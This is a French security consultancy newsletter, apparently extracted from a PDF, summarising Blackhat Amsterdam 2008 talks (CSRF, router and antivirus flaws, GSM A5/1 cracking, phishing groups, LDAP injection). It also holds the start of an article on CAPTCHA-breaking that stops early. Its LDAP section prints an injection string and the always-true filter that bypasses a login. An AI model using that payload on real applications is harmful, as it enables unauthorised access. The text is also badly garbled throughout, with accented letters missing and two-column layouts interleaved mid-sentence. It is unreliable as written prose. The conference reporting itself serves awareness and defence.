XMCO ActuSecu 19 Blackhat

LACTUSCU 19 XMCO | PARTNERS
DOSSIER SPECIAL BLACKHAT 2008

SO MM AIR E
Dossier B l a c k h a t 2 0 0 8 : p r s e n t a t i o n d e l a c o n f re n c e et des
p rinci pa u x su j e t s .
La mort d e s C A P T C H A: c o m m e n t l e s p i r a t e s a r r i v e n t - i l s c a sser les

diffrentes m t h o d e s d e C A P T CH A m i s e s e n p l a c e ?
L a c t u a l i t d u m o i s : prsentation des vulnrabilits et faits

marquants
Les out il s /s it e s w e b du m o i s : L e s e x t e n s i o n s F i re f o x u t i l e s
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

strictement interdite. [1]
LACTU SCU N19
Vo u s t e s c o n c e r n p a r l a s c u r i t i n f o r m a t i q u e d e v o t r e e n t r e p r i s e ?
Xmco Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.
Tests d'intrusion
Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusion
OWASP, OSSTMM, CCWAPSS
Audit de scurit
Audit technique et organisationnel de la scurit de votre Systme d'Information
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley
Veille en vulnrabilits
Suivi personnalis des vulnrabilits et correctifs affectant votre Systme d'Information
Rponse intrusion
Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware
A propos du cabinet Xmco Partners
Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets
forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent nos axes majeurs de dveloppement
pour notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de
RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands
comptes franais.
Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/

WWW.XMCOPARTNERS.COM

LEDITO NU M E R O 19
O est le maillon faible...?
Dans l'industrie, les entreprises lentreprise sans dconnecter son SI est gale la scurit de son
voluent sans cesse pour joujou. lment le plus faible....
amliorer leurs chanes de
production. Des cahiers des Un serveur NT4 de 1999 connect
charges sont mis rgulirement sur le domaine un compte
pour obtenir des outils plus "Administrateur de domaine" et un
performants. mot de passe gal au login,
constitue ce que l'on peut appeler
En informatique, cest le contraire : trivialement l'lment le plus
les diteurs font frntiquement faible.
natre des besoins dans les
entreprises en multipliant les En l'occurrence, une des
logiciels et leurs volutions. Ainsi, difficults des entreprises consiste
il est possible de constater des aujourdhui retrouver tous ces
effets de mode voire l'achat de Dans le cadre daudits, lorsque trophes dun jour, ces outils
produits inutiles. Linutilit de ces notre attention tente de se miracles dont on nous avait
outils les conduit labandon. focaliser sur un serveur NT4 pourtant dit tant de bien...Tout en
C'est ainsi que l'on retrouve trangement prsent sur le vitant de sen faire refourguer
rgulirement des serveurs rseau, il arrive que la rponse des nouveaux...
connects sur des domaines, soit malheureusement : "c'est un
machines fantmes dont plus vieux serveur pas important, il Qui a dit que la vie ntait quun
personne ne connat vraiment le devrait tre dbranch". ternel recommencement ?
rle, les objectifs et les enjeux.
Quid de ladage cul, survendu
Certains de ces serveurs survivent Frdric Charpentier
par TOUS les commerciaux des
parfois leur gniteur, qui quittera Consultant XMCO
mmes diteurs : la scurit d'un
Blackhat Amsterdam 2008...........................4 LActualit scurit du mois....................20

Prsentation des sujets marquants de la confrence Analyse des vulnrabilits dcouvertes.
internationale.
La mort des CAPTCHA...............................13 Outils Libres...............................................24

Analyse des techniques utilises par les pirates pour Dcouvrez les outils utiles et pratiques.
contourner cette protection.

LACTU SCU N19
BLACKHAT 2008 Rsum des sujets marquants

Cette confrence attendue par
tous les experts en scurit
nest plus prsenter.
Dans le monde de la scurit

informatique, la Blackhat est
LEVENEMENT ne pas rater. Au
travers dune vingtaine de
prsentations, dont la plupart
seront ensuite reprises dans
dautres confrences, les
chercheurs et les consultants
du monde entier viennent
partager leurs trouvailles et
rvler au grand public
certaines failles de scurit
dans divers domaines :
applicatif, systme, matriel,
chiffrement, GSM
Petit aperu des confrences

auxquelles nous avons pu
assister en compagnie de
plusieurs de nos confrres
(Lexsi, HSC, Edelweb).
XMCO | Partners
Comme chaque anne, deux sujets sont traits en Les passionns et les adeptes de son blog nont certes
parallle dans deux salles diffrentes. Nous vous rien appris de nouveau en assistant cette
proposerons seulement le rsum des prsentations prsentation. Cependant, les autres ont pu dcouvrir
auxquelles nous avons assist. les nombreux problmes dont souffre la partie cliente
du modle client/serveur, applique aussi bien aux
Premire journe navigateurs Internet et aux ordinateurs eux-mmes
Client Side Security considrs comme des clients dun rseau.
Aprs une introduction mene avec humour et drision

par Ian Angell, professeur luniversit London School
of Economics, la premire prsentation fut propose
par Pekto D.Pektov, leader du groupe de chercheurs
nomm GNUCITIZEN Ethical Hacker. Cette

confrence nous intressait particulirement, car nous
suivons avec attention leur blog qui prsente chaque
jour des sujets scurit toujours plus intressants les
uns que les autres [1].
Pekto a donc choisi de nous rsumer les

diffrentes vulnrabilits dcouvertes au Quatre grands thmes ont t abords brivement
long de lanne 2007 par son groupe de durant sa prsentation. Le but ntait pas dvoquer
toutes les vulnrabilits dcouvertes lanne passe,
recherche

LACTU SCU N19
mais plutt de dresser un constat alarmant dans quatre afin de lancer des commandes lors dune connexion
domaines distincts. distante un serveur Windows ou Citrix. Toute la
difficult de lattaque consistait alors inciter une
Le premier thme trait concernait les attaques CSRF victime (possdant un compte sur un serveur Windows
(Cross Site Request Forgery) dont nous vous avons ou Citrix) ouvrir un fichier de ce type.
dj parl au sein de notre ActuScu de fvrier 2007.
Ce type dattaque largement exploite sur Internet a Enfin, la prsentation de Pektov sest termine par les
pour but de forcer un navigateur excuter des diffrentes possibilits dutilisation malicieuses du
commandes cibles linsu de la victime. Pekto a donc protocole JAR, ainsi que sur une rflexion propos de
expliqu en dtail plusieurs scnarios dattaques. Tout la future gnration de rootkits. Pektov prvoit un
d'abord, une backdoor nomme "Hijack Gmail" qui, dveloppement de rootkit de 4me gnration : intgrs
une fois installe sur un compte de la messagerie de au sein des navigateurs, ces rootkits utiliseront les
Google, exploite une vulnrabilit CSRF en ajoutant un nouveauts du WEB 2.0.
filtre Gmail capable denvoyer discrtement tous les
emails reus par la victime vers ladresse email du Au travers dexemples prcis, de preuves de concept
pirate. varies et dexplications dtailles, Pektov a voulu
mettre laccent sur les nouvelles menaces dont sont
Le second thme a ensuite illustr victimes les applications clients au
plusieurs failles de scurit sens large. Les pirates concentrent
identifies au sein du serveur web de plus en plus leurs efforts sur ce
embarqu au sein du routeur ADSL genre de vulnrabilits afin de cibler
le plus utilis en Angleterre : le BT les end users.
Home hub. Ces failles permettent,
via une simple requte HTTP GET,
de reconfigurer le routeur sans
a u c u n e a u t h e n t i fi c a t i o n . Attacking Antivirus
GNUCITIZEN a point du doigt les
La deuxime confrence [2]
lacunes du protocole UpNp en
laquelle nous avons assist
prsentant les nouvelles techniques
concernait les antivirus. Feng Xue,
dattaques associes. En tudiant
chercheur en vulnrabilits, a
avec attention un routeur
prsent les faiblesses dont sont
implmentant UpNp, Pektov a
victimes la plupart des antivirus du
prouv comment une simple
march. Erreur de design, problme
requte SOAP camoufle au sein
de pilotes ou de droits sur les
dune animation flash pouvait
rpertoires dinstallation, erreurs de
reconfigurer nimporte quel routeur
validation lors de lexcution dActive
de ce type. Ce thme sera dailleurs
X, dbordements de tampons, etc. Au
abord en dtail dans notre prochain
total plus dune soixantaine de
numro de lActuScu...
failles de scurit ont t
Le troisime thme traite les dcouvertes au sein de logiciels de
vulnrabilits appeles Command/ ce type durant lanne 2007.
Shell fixation attack. Ce terme
Les pirates seraient, selon lauteur,
dsigne les erreurs de validation que
de plus en plus intresss par ce
lon peut retrouver au sein de
maillon faible du Systme
nombreux logiciels, permettant de
dInformation. Les antivirus
passer des commandes systme,
constitueraient une porte dentre
sans contrle pralable. Plusieurs
souvent peu scurise. Lenvoi dun

exemples ont permis dillustrer ce type de problme: la
email contenant en pice jointe un fichier malicieux
vulnrabilit Quicktime/Firefox dcouverte en
scann par lantivirus permettrait donc un pirate de
septembre 2007, qui permettait dexcuter des
prendre le contrle des machines sous-jacentes.
commandes systmes via la visite dune simple page
HTML incluant un lien QTL malicieux, les attaques de Malheureusement, bien que le sujet de la prsentation
Cross Site Scripting via Skype ou encore la fonction aurait pu tre passionnant, les dmonstrations live de
Chrome au sein de Firefox. Feng Xue se sont limites faire "planter" un antivirus
en crant de nombreuses archives malformes. Les
Pektov a galement mis en vidence dautres
auditeurs auraient prfr des exemples plus aboutis et
p r o b l m e s l i s a u t r a i t e m e n t d e s fi c h i e r s
mieux prpars
.RDP (Bureau distance) ou . ICA (Citrix). En effet,
certaines proprits mconnues pouvaient tre
insres au sein dun fichier de connexion RDP ou ICA

LACTU SCU N19
CrackStation et Iron Chef JFORUM et constitue de plus de 15 000 lignes de
code. En moins de 45 minutes, les quatre participants
Aprs un djeuner sponsoris par Microsoft, les devaient identifier le maximum de problmes en
confrences ont repris laprs-midi. Au programme de expliquant leurs mthodes et les outils utiliss. Une
la premire confrence Crackstation [3] ou quipe a prfr utiliser un outil automatique tandis que
Developments in Cisco Forensics. Ce second thme lautre a ralis une analyse manuelle.
ciblait une population spcifique et abordait un thme
lgrement plus ennuyeux. Nous avons prfr assister Lide de ce challenge en direct nest pas nouvelle et
la prsentation de la Crackstation. attire toujours un grand nombre de passionns du
genre adeptes des dmonstrations en direct.
Nick Breese, Cependant, le sujet choisi (audit de code) ntait pas le
consultant en plus passionnant La battle fut relativement
scurit, a prsent ennuyeuse et les rsultats ntaient pas la hauteur de
ses recherches nos attentes (bien que les deux quipes en lice taient
doptimisation de certainement des spcialistes renomms pour ce genre
calcul utilis lors du daudit). Nous nous attendions dcouvrir des
crack dun mot de mthodes danalyse originales et des explications
passe. Aprs pousses sur chacune des vulnrabilits ce qui ne fut
quelques mois de pas le cas
recherche, lauteur a
pu augmenter The fundamentals of physical security
considrablement
les performances de La premire journe sest conclue en beaut avec une
crack de mots de prsentation particulirement interactive de Deviant
passe en utilisant Ollam sur la scurit physique et le Lock Picking ou
les calculs vectoriels crochetage en franais [5]. Ce sujet, abord de long en
sur une console large lors des confrences ShmooCon, DefCon, HOPE,
Playstation 3 HackCon, HackInTheBox ou encore les annes
implmentant un prcdentes la Blackhat, jouit toujours dun succs
systme dexploitation Linux. La limite actuelle de indniable surtout lorsque les explications thoriques
10--15 millions cycles par seconde sur une architecture sont accompagnes de dmonstrations live toujours
Intel a t nettement dpasse pour atteindre plus impressionnantes les unes que les autres:
aujourdhui prs de 1,4 milliard de cycles par seconde. ouverture de menottes ou encore dun cadenas
combinaison avec une cannette de bire !
Le sujet, bien que techniquement intressant, est
rapidement devenu indigeste avec lexplication de
lignes de code, ce qui n'est pas le meilleur moyen de
passionner les auditeurs aprs un repas
particulirement copieux...
La deuxime partie de laprs-midi fut plus attrayante

en commenant par un challenge.
Iron Chef Challenge [4] mettait en confrontation deux

quipes spcialises dans laudit de code sur un projet
inconnu : laudit dune application JAVA nomme
M.Ollam, expert dans le domaine, a donc prsent les

diffrents systmes de serrure les plus utiliss travers
le monde et les mthodes pour les ouvrir laide
doutils spcifiques. Des serrures basiques, en passant
par les cadenas combinaison (Dial Combination
Lock), les U (tubular lock) ou encore les serrures clefs
plates (Dimple Locks), de nombreux mcanismes ont
t clairement expliqus avec des animations
convaincantes et mis mal par lexpert.
Fin de la premire journeplace au cocktail et aux

goodies offerts par Google

LACTU SCU N19
Seconde journe Pour les connaisseurs du domaine de lanalyse
Mobile Phone Spying Tools antivirale, les mthodes restent les mmes savoir
lcoute du trafic sortant, la recherche en profondeur de
Le premier sujet [6] de la seconde journe a t abord traces sur le tlphone (fichiers crs ou processus
par Jarno Niemela, chercheur au sein de la socit F- lancs lors de lexcution du virus) ou encore ltude du
Secure. Jarno a prsent un nouveau flau qui ne registre pour les plates-formes Windows.
cesse de se dvelopper: les outils despionnage GSM. Pour les novices du domaine, lanalyse tait claire et
prcise.
En effet, les malwares GSM se dveloppent depuis
quelques mois. Certains les commercialisent en tant La prsentation a donc apport une nouvelle vision des
quoutil de surveillance (notamment pour les mres de menaces virales sur dautres plates-formes que celles
famille ou pour garder une trace de lutilisation dun dont nous sommes le plus familier. Il est certain que
tlphone). Dautres dveloppent ce nouveau genre de lvolution continuelle des plates-formes mobiles avec
virus des fins malveillantes. le dveloppement de la 3G poussera les pirates
sintresser de prs de nouveau genre de malware.
Jarno, spcialiste dans ce domaine nous a donc
prsent ce genre de vermine capable de relayer les
SMS/MMS, les emails, les informations stockes dans
la carte SIM ou encore enregistrer/intercepter des
conversations tlphoniques.Inquitant. INFO...
Dautres confrences toujours passionnantes
Lvolution continuelle des plate-formes
et des services de tlphonie mobile Le Blackhat est lune des confrences les
plus attendues. Nanmoins, il existe de
poussera les pirates sintresser de prs nombreux rassemblements dont notamment la
ce genre de malware CanSecWest qui permet tous les
chercheurs et pirates de saffronter afin
de dcouvrir des vulnrabilits 0-day sur
travers plusieurs exemples (Neo-call, FlexiSPy), les systmes les plus utiliss.
lauteur a pu montrer la puissance de ces espions, puis L'objectif de cette confrence tait de
a analys les mthodes de dtection et les outils dmontrer de nouvelles vulnrabilits sur
associs. trois systmes d'exploitation diffrents:
- Windows Vista SP1
- Ubuntu 7.10
- Mac OS X 10.5.2 (Leopard)
Plus d'informations ont t donnes dans
le bulletin XMCO [1]
Lors de la premire journe, rserve aux

attaques distantes depuis un autre
ordinateur sur rseau local, aucun des
systmes n'a pu tre compromis par les
diffrents experts.
Cependant, ds le deuxime jour,
l'utilisation de navigateurs internet et
de clients de messagerie, ont t
autoriss.
Mac OS X Leopard fut le premier cder.
Une vulnrabilit dcouverte au sein du

navigateur Safari a permis un concurrent
de prendre le contrle du systme.
L'exploit, dont le dtail ne sera pas
divulgu tant que l'diteur n'aura pas
corrig la faille, a permis aux chercheurs
de compromettre le systme d'exploitation
en seulement deux minutes.
Microsoft pensait se sortir indemne de

cette exprience. Cependant, le jour
suivant ce fut au tour de Windows Vista
SP1 dtre compromis par le biais dune
vulnrabilit d'Adobe Flash.

LACTU SCU N19
Intercepting GSM Trafic Linterception des premires trames chiffres
changes entre la borne GSM (la BTS) et le tlphone
La confrence la plus attendue de cette session permettrait dexploiter pleinement les vulnrabilits
Amsterdam tait sans aucun doute Intercepting GSM dcouvertes.
trafic [7] prsente par par David Hulton et Steve
Schear. Ces derniers, chercheurs au sein de la socit En effet, chacune des cartes SIM possde sa propre
Pico Computing et membres du groupe The Hacker clef de chiffrement. Cette dernire est utilise par la
Choice connu pour le clbre outil de cracking Hydra, borne GSM et le mobile afin de crer une clef de
ont russi mettre en uvre une mthode session. Cette clef de session chiffre ensuite les 16
dinterception et de dchiffrement du trafic GSM rapide prochains appels mis par un tlphone donn. A la
et efficace. suite de longs mois de recherches, les deux experts ont
eu lide de gnrer une sorte de Rainbow Table
En moins de 30 secondes et sur un rayon de 30 km, les associant tous les flux de chiffrements avec les tats
deux experts seraient en mesure dintercepter et de associs. Au final, le nombre de possibilits atteint alors
c r a c k e r l e c h i ff r e m e n t d e s c o m m u n i c a t i o n s 288 230 376 151 711 744 combinaisons, soit 120 000
tlphoniques GSM. fois suprieur la plus grande Rainbow table LM
(algorithme utilis pour les anciens mots de passe
Lenjeu de leurs recherches tait donc double : tre Microsoft Windows).
capable de dvelopper un quipement dcoute GSM
un prix abordable, mais galement de dchiffrer ces
paquets rapidement en exploitant les faiblesses de
Malgr des recherches et des
lalgorithme A5/1 utilis par la plupart des oprateurs explications trs intressantes, aucune
de tlphonie mobile. dmonstration live na t ralise...
Ct rception des trames GSM, les rcepteurs Ces calculs limitent immdiatement toute gnration de
existent mme si leurs cots restent levs pour des Rainbow tables avec des ordinateurs classiques (33
quipements professionnels (de 70 000 1 million 235 annes pour une gnration de 550 000
deuros) ou alors ridicules pour certains tlphones possibilits par seconde). David Hulton et Steve Schear
vendus il y a quelques annes avec des fonctions de ont donc utilis un ordinateur puissant muni de
maintenance (Ericsson, Nokia, Sagem) et que lon peut plusieurs cartes FPGA (16 au total) capables de
retrouver sur ebay pour quelques dollars. Les experts gnrer 72 533 333 333 possibilits par seconde ce qui
ont trouv le moyen de dvelopper un tel appareil ramne alors la gnration de tables 3 mois environ
fonctionnel pour moins de 900$, mais ce sujet ntait (pour 2 Tera Octets).
pas laxe directeur de leur prsentation.
INFO...
La fibre optique galement sur la sellette
Lors de la confrence InfoSecurity se

droulant la semaine dernire Londres
[1], l'entreprise Infoguard a dmontr
les faiblesses des liaisons en fibre
optique.
En effet, cette entreprise a ralis

une dmonstration en temps rel
permettant d'espionner les
communications transitant par une fibre
optique. En pliant lgrement la fibre,
Ct chiffrement, la vritable innovation du domaine une partie des ondes lumineuses n'est
concerne lexploitation relle des faiblesses de cet plus rflchie. Il est alors possible
algorithme dmontres il y a quelques annes. de rcuprer le contenu de la
transmission avec des appareils d'une
Afin de rester simple et de ne pas rentrer dans des centaine de dollars. Lors de cette
explications cryptographiques qui pourraient elles dmonstration, Infoguard a pu
seules faire lobjet dun ActuScu, les faiblesses du reconstituer une conversation
chiffrement A5 sont exploitables lors de la phase tlphonique passe travers ce type
dinitialisation des appels. de support.

LACTU SCU N19
Pour cracker en direct une communication La plupart des Phishers ne sont en aucun cas des
tlphonique, il suffit de possder cette Rainbow hackers confirms, mais plutt les maillons dune
table avec un ordinateur implmentant de 1 (30 chane qui englobe de nombreux acteurs (les
minutes) 16 carte FPGA (30 secondes). spcialistes dans le piratage de serveurs, les
dveloppeurs qui crent les outils utiliss, les vendeurs
Les deux hommes prvoient dj de rendre libre leur de ces outils et enfin les Phishers qui mettent en place
mthode de dchiffrement et loutil associ. Cependant, les pages malicieuses). Ces derniers se cantonnent
une version volue capable de cracker les uniquement installer des pages web sur des serveurs
communications GSM en moins de 30 secondes sera compromisrien de plus. Cest dailleurs pour cela que
prochainement commercialise entre 200 000 et 500 la plupart des serveurs utiliss par les phishers sont
000 dollars ce qui pourrait intresser les agences peu scuriss et que bon nombre dentre eux se sont
gouvernementales ou des investisseurs. fait avoir leurs propres jeux en achetant des kits
backdoors : le phisher phish.
Malheureusement, bien que les recherches paraissent
abouties et vridiques, aucune dmonstration
"live" (tant attendue) na encore t prsente ce qui
pousserait rellement les oprateurs a implmenter le
chiffrement A5/3 toujours incassable et prt tre
utilis dans le monde de la tlphonie mobile.
La dmonstration sera peut-tre prsente la

BlackHat Las Vegas o nous serons certainement
prsents.
Bad Sushi
Une autre confrence trs attendue tait prsente par

Au travers de diffrents exemples et sans avoir recours
un expert reconnu Billy Rios (Microsoft) et Nitesh
au piratage de serveurs, Rios et Dhanjani nous ont
Dhanjani (Ernst and Young), un autre spcialiste. Les
premiers chos parlaient dj dune prsentation axe donc fait entrer dans ce monde underground,
sur le hacking de groupe de Phishers mais personne ne composs de forums plus ou moins cachs en
savait exactement de quoi allait tre faite la prsentant les mthodes dadministration (webshells),
prsentation. Le titre Beating Phishers at their own les backdoor installes lors de lchange de pages web
game annonait un cadre juridique flou et des rsultats malicieuses entre Phishers.
impressionnants.
Alors que lon pourrait penser que les INFO...

Phishers professionnels sont des pirates
XMCO la SSTIC
aguerris utilisant des 0-day pour pntrer
certains serveurs, le bilan est tout autre... La confrence SSTIC (Symposium sur la
Scurit des Technologies de
l'Information) peut tre considre
Les auditeurs ne furent pas dus avec une comme l'quivalent francophone de la
prsentation simple, la porte de tous et agrmente BlackHat. XMCO y sera reprsent par
Frdric Charpentier et Yannick Hamon
de photos, exemples et blagues. Le cur du sujet
qui prsenteront les rsultats de leur
ntait en aucun cas pirater les pirates, mais plutt analyse du malware Anserin/Torpig.
dinfiltrer certains groupes de Phishers afin de connatre
le dessous de liceberg comme le prsente Billy Rios et Lors de cette confrence intitule
dcouvrir les mthodes de vente des Phishers, les "Autopsie et observations in vivo dun
banker", nos chers collgues
outils utiliss, les mthodes de social engineering, mais
prsenteront les spcificits
galement les limites de certains groupes constitus techniques qui font de ce malware
par des scripts kiddies. l'ennemi numro des banques en ligne.
Anserin/Torpig est en effet capable de
Les rsultats de leurs recherches sont pour le moins djouer les claviers virtuels et les
surprenants. Alors quon pourrait penser que ces autres protections anti-keylogging.
Phishers sont des pirates aguerris utilisant des exploits
0-day afin de pntrer certains serveurs, le bilan est
tout autre.

LACTU SCU N19
LDAP Injection Si lapplication ne contrle pas ces entres, un pirate
pourrait injecter dans le champs login la chane de
La scurit des applications web constitue un chantier caractre suivante : Adrien)(&) ce qui aura pour effet
significatif pour les RSSI. Les techniques voluent de gnrer le filtre suivant :
toujours : XSS, Injection SQL, CSRF mais certaines
sont plus connues que dautres.
La prsentation LDAP Injection avait donc pour objectif (&(USER=Adrien)(&))(PASSWORD= jU9i7ht4=d))
de montrer les mfaits dune autre catgorie dattaque
trs proche de linjection SQL, linjection de commande
LDAP partir dune application web.
Pour les experts, le sujet nest pas

nouveau. Les passionns de hacking ou
les consultants scurit n'ont rien appris
et ont certainement dj exploit ce
genre de vulnrabilit applicative.
Cependant, la prsentation de M.
Chema Alonso et M. Jose Parada
Gimeno, tous deux travaillant chez
Microsoft, a donn un trs bon aperu
des risques et des consquences d'une
utilisation non contrle du service
LDAP au sein dune application web.
Linjection LDAP se dfinit donc comme

une attaque qui permet via linsertion
dun paramtre non valid ct serveur
de forcer lapplication excuter une
commande LDAP arbitraire et dextraire
des informations sensibles hberges
au sein dun annuaire LDAP. Seule la premire partie du filtre sera interprte par le
serveur LDAP. La requte tant tout le temps vrai, cela
Prenons un exemple simple. Imaginons une application permettra lattaquant de sidentifier sans connatre le
web qui base lauthentification sur des donnes mot de passe associ. Linjection peut alors tre mene
extraites de lannuaire. Une fois soumis, les identifiants sur un formulaire de login et bien entendu sur
(adrien-jU9i7ht4=d) sont inclus au sein dun filtre LDAP laffichage de donnes rcupres via lannuaire LDAP.
et transmis au serveur LDAP de la manire suivante :
Au travers de diffrentes dmonstrations sur une
application dveloppe pour loccasion, ces deux
(&(USER=Adrien)(PASSWORD= jU9i7ht4=d)) Espagnols ont galement prsent les injections
Blind LDAP (en aveugle). Cette technique galement
proche dune injection SQL du mme
type permet de mener la mme attaque
sans avoir de retour visuel
(comparaison entre laffichage dune
requte correcte et dune requte
incorrecte). Un outil a dailleurs t
dvelopp pour automatiser lattaque

facilement.
Cette prsentation aura eu lavantage

de prsenter avec des exemples prcis
ce type dattaque et de mettre en avant
LE problme majeur des applications
web savoir le contrle des entres
utilisateur.

LACTU SCU N19
New Viral Threats of PDF Language http://www.blackhat.com/presentations/bh-europe-08/
Feng-Xue/Presentation/bh-eu-08-xue.pdf
Enfin, la dernire confrence tait prsente par Eric
Filiol, chercheur lieutenant-colonel de l'Arme de Terre [3] CrackStation :
franaise, expert franais en scurit informatique et http://www.blackhat.com/presentations/bh-europe-08/
spcialis en cryptologie et virologie. La confrence Breese/Whitepaper/bh-eu-08-breese-WP.pdf
sest axe sur les possibilits offertes par le format PDF http://www.blackhat.com/presentations/bh-europe-08/
et son langage de programmation. Au fil des annes, Breese/Presentation/bh-eu-08-breese.pdf
Acrobat Reader sest enrichi de fonctionnalits
mconnues, mais malheureusement exploitables par [4] Iron Chef Black Hat: John Henry Challenge :
des virus en tout genre. Au travers de diffrents http://www.blackhat.com/presentations/bh-europe-08/
exemples, M.Filiol a mis en vidence les risques et les Iron_Chef/Presentation/bh-eu-08-iron_chef.pdf
menaces venir via ce type de fichiers.
[5] The Fundamentals of Physical Security :
http://www.blackhat.com/presentations/bh-europe-08/
Deviant_Ollam/Whitepaper/bh-eu-08-deviant_ollam-
Conclusion
WP.pdf
Cette anne, la confrence ne fut pas au niveau de
Deviant_Ollam/Presentation/bh-eu-08-
nos attentes (cf Blackhat 2007 avec les
deviant_ollam.pdf
dmonstrations Live du hacking Oracle, analyse de
David Lichtfield), le cru 2008 ntait pas la hauteur
Deviant_Ollam/Extras/Videos.zip
de celui de lan pass.
http://deviating.net/lockpicking/
En effet, mme si plusieurs prsentations taient
trs intressantes et agrmentes de [6] Mobile Phone Spying Tools :
dmonstrations, dautres nont rien apport aux http://www.blackhat.com/presentations/bh-europe-08/
consultants qui suivent rgulirement lactualit Niemela/Presentation/bh-eu-08-niemela.pdf
scurit. Nous pouvons notamment pointer du
doigt les prsentations "SPAM Evolution" dont [7] Intercepting Mobile Phone/GSM Traffic :
lauteur sest uniquement limit numrer des http://www.blackhat.com/presentations/bh-europe-08/
mthodes obsoltes de contournement de filtres Steve-DHulton/Whitepaper/bh-eu-08-steve-dhulton-
anti-SPAM ou encore LDAP Injection qui WP.pdf
prsentait en dtail comment mener une injection http://www.blackhat.com/presentations/bh-europe-08/
LDAP lors dun test dintrusion applicatifou Steve-DHulton/Presentation/bh-eu-08-steve-dhulton.pdf
encore "Malware on the Net Behind the Scenes"
qui prsentait, une fois de plus, les rseaux
[8] LDAP Injection & Blind LDAP Injection :
cybercriminels, les ventes underground dexploits
et dinformations ainsi que leurs mthodes
Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-
dexploitation (MPACK, Neosploit).
WP.pdf
Nous ne remettons pas en cause la qualit des
orateurs, mais plutt le choix de quelques sujets
Alonso-Parada/Extras/LdapInjector_final.zip
peu approfondis ou dj abords auparavant et qui
napportent pas de nouveaux lments pour les
[9] New Viral Threats of PDF Language :
consultants scurit. La BlackHat reste nanmoins
une confrence passionnante o il demeure
Filiol/Whitepaper/bh-eu-08-filiol-WP.pdf
toujours difficile de choisir entre les deux
confrences qui se droulent simultanment Filiol/Presentation/bh-eu-08-filiol.pdf
Spam Evolution :
Webographie http://www.blackhat.com/presentations/bh-europe-08/
Jakhar/Whitepaper/bh-eu-08-jakhar-WP.pdf
[1] Client-side Security :
http://www.gnucitizen.org/ Malware on the Net - Behind the scene : :http://
http://www.blackhat.com/presentations/bh-europe-08/ www.blackhat.com/presentations/bh-europe-08/Amit/
Petkov/Whitepaper/bh-eu-08-petkov-WP.pdf Whitepaper/bh-eu-08-amit-WP.pdf
http://www.blackhat.com/presentations/bh-europe-08/ http://www.blackhat.com/presentations/bh-europe-08/
Petkov/Presentation/bh-eu-08-petkov.pdf Amit/Presentation/bh-eu-08-amit.pdf
[2] Attacking Anti-Virus : 0-Day Patch -Exposing Vendors (In)Security

http://www.blackhat.com/presentations/bh-europe-08/ Performance :
Feng-Xue/Whitepaper/bh-eu-08-xue-WP.pdf

LACTU SCU N19
Frei/Whitepaper/bh-eu-08-frei-WP.pdf
Biologger - A Biometric Keylogger :

Lewis/Whitepaper/bh-eu-08-lewis-WP.pdf
Lewis/Presentation/bh-eu-08-lewis.pdf
Developments in Cisco IOS Forensics :

FX/Whitepaper/bh-eu-08-fx-WP.pdf
URI Use and Abuse :

McFeters-Rios-Carter/Whitepaper/bh-eu-08-mcfeters-
rios-carter-WP.pdf
McFeters-Rios-Carter/Presentation/bh-eu-08-mcfeters-
rios-carter.pdf
Antiphishing Security Strategy :

Rosiello/Presentation/bh-eu-08-rosiello.pdf
Security Failures in Secure Devices :

http://www.blackhat.com/html/bh-europe-08/bh-eu-08-
archives.html
Investigating Individuals and Organizations Using

Open Source Intelligence :
http://www.blackhat.com/html/bh-europe-08/bh-eu-08-
archives.html
Temmingh-Bohme/Presentation/bh-eu-08-temmingh-
bohme.pdf
Exposing Vulnerabilities in Media Software :

Thiel/Whitepaper/bh-eu-08-thiel-WP.pdf
Thiel/Presentation/bh-eu-08-thiel.pdf
Hacking Second Life :

Thumann/Whitepaper/bh-eu-08-thumann-WP.pdf
Thumann/Presentation/bh-eu-08-thumann.pdf

LACTU SCU N19
Les attaques contre le CAPTCHA

dsds
Le CAPTCHA, mis en place dans dds
les annes 2000, a t jusqu
aujourdhui une protection
incontournable pour diffrencier
lhomme dun robot.
Les pirates ont compris lintrt
de casser cette mthode afin de
pouvoir polluer les forums ou de
crer automatiquement des comptes
mail.
Depuis quelques mois, les

techniques dattaques contre les
CAPTCHA se dveloppent.
Prsentation et explications des
diffrentes techniques utilises
par les pirates...
XMCO | Partners
Introduction leurs campagnes publicitaires de manire automatise.

Prsentation des CAPTCHA
Le SPAM est devenu, anne aprs anne, un flau qui

ne cesse de progresser. Les pourriels reprsentent une
part de march de plus en plus importante chaque jour.
On estime prs de 90% le pourcentage des emails
publicitaires et frauduleux sur lensemble des emails
envoys travers le mondeautant dire que la guerre
est perdue...
Le SPAM peut galement revtir une autre forme, les
spammeurs tentent de sattaquer au contenu de forums
afin dy insrer leurs publicits ou redirection vers Les pirates face aux CAPTCHA
dautres sites malveillants.
Face ces protections, les pirates ont d trouver des
Auparavant, aucun mcanisme ne pouvait empcher moyens de continuer polluer la toile.
des outils et des virus de crer des comptes sur les
webmails ou dinsrer des commentaires au sein de En effet, lutilisation de serveurs pirats ou lous pose
forums de manire automatise. toujours le mme problme (voir ActuScu n18). Ces
derniers sont rapidement identifis en tant que serveurs

Afin dy remdier, les dveloppeurs ont mis en place de SPAM par les organismes ddis (Spamhause.).
partir de 2000, le CAPTCHA (Completely Automated Les logiciels anti-spam qui se basent galement sur
Public Turing test to tell Computers and Humans Apart), des listes noires peuvent alors contrer les tentatives
mthode destine diffrencier les humains des des spammeurs.
machines. Cette mthode repose sur le principe quen
fournissant une image contenant des caractres Les pirates se sont donc concentrs sur des mthodes
dforms, seul un humain tait capable den extraire le de contournement de ces CAPTCHA. Les enjeux sont
contenu et de saisir les lettres sur son clavier. de taille, en russissant contourner cette protection,
les spammeurs peuvent automatiser des requtes afin
LE CAPTCHA est particulirement utilis sur les dutiliser les serveurs de messagerie de socits
forums ou sur les webmails lors de la cration de rputes (Gmail, Microsoft, Yahoo, ) afin que les
comptes ce qui empche les spammeurs de mener emails ne soient pas bloqus auprs des filtres anti-

LACTU SCU N19
